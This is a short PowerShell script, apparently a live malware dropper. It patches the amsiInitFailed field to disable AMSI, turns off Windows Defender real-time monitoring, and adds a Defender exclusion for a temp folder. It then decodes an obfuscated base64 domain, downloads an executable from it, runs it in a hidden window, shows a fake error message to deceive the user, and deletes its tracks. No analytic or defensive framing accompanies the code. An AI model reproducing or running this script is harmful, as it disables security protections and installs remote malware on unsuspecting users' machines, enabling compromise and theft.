param([int]$r=5,[int]$d=5)
$x1=[char[]]'AMSI';$x2=[char[]]'Utils';$x3=[char[]]'amsiInitFailed'
$s1=-join$x1;$s2=-join$x2;$s3=-join$x3
function i-d {
    try{
        $a=[AppDomain]::CurrentDomain.GetAssemblies()|?{$_.GetName().Name-eq'System.Management.Automation'}|select -f 1
        if($a){
            $t=$a.GetType("System.Management.Automation.$s1$s2")
            if($t){
                $f=[Reflection.BindingFlags]::NonPublic -bor [Reflection.BindingFlags]::Static
                $p=$t.GetField($s3,$f)
                if($p){$p.SetValue($null,$true)}
            }
        }
    }catch{}
}
i-d
function g-f {
    param($u,$o)
    for($i=1;$i-le$r;$i++){
        try{
            $w=New-Object Net.WebClient
            $w.Headers['User-Agent']='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
            $w.DownloadFile($u,$o)
            if(Test-Path $o){return $true}
        }catch{}
        Start-Sleep -s($d*[Math]::Pow(2,$i-1)+(Get-Random -max 3))
    }
    return $false
}
$t1=[guid]::NewGuid().ToString('N').Substring(0,8)
$p1=Join-Path $env:TEMP "tmp$t1"
$f1=Join-Path $p1 "app$t1.exe"
$subdomain='files-epf'
$b2=[Text.Encoding]::ASCII.GetBytes('ZHJpdmVyMzIuc3lzdGVtcw==')
$filename='putyy'
$p3=[Text.Encoding]::ASCII.GetString([Convert]::FromBase64String([Text.Encoding]::ASCII.GetString($b2)))
$u1="https://$subdomain.$p3/$filename.exe"
try{
    Set-MpPreference -DisableRealtimeMonitoring $true -EA 0
    Start-Sleep 1
}catch{}
New-Item -Path $p1 -ItemType Directory -Force|Out-Null
try{
    Add-MpPreference -ExclusionPath $p1 -EA 0
}catch{}
if(g-f $u1 $f1){
    Write-Host 'Initialization failed. Please run PowerShell as administrator.' -ForegroundColor Red
    try{
        $process = Start-Process -FilePath $f1 -WindowStyle Hidden -PassThru
        if($process -and !$process.HasExited){
            Start-Sleep 5
        }
    }catch{}
}
Remove-Item $p1 -Recurse -Force -EA 0